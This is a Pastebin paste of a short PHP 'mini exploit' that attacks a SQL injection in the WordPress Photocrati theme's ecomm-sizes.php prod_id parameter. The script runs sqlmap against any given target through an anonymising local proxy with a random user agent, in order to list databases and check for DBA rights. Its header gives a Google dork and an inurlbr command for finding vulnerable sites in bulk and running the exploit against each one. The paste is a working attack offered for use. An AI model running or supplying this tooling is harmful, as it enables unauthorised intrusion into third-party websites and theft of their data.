Googleinurl

[MINI EXPLOIT] Wordpress Theme Photocrati 4.x.x - SQLI & XSS

Mar 20th, 2015
1,174
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  4. # Blog:          http://blog.inurl.com.br
  5. # Twitter:       https://twitter.com/googleinurl
  6. # Fanpage:       https://fb.com/InurlBrasil
  7. # Pastebin       http://pastebin.com/u/Googleinurl
  8. # GIT:           https://github.com/googleinurl
  9. # PSS:           http://packetstormsecurity.com/user/googleinurl/
  10. # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  11. # REF:           http://www.exploit-db.com/exploits/36242/
  12. # DORK:          inurl:"/ecomm-sizes.php?prod_id="
  13. # INURLBR:       ./inurlbr.php --dork 'inurl:"/ecomm-sizes.php?prod_id="' -s save.txt -q 1,6,7,14 --comand-all 'php miniexploit3.php  _TARGETFULL_'
  14. echo "[+]  MINI exploit-SQLMAP / Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS\n";
  15. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
  16. $command = "python ../sqlmap/sqlmap.py -u '{$target}' -p prod_id --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
  17. system($command, $dados).empty($dados[0]) ? exit() : NULL;
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×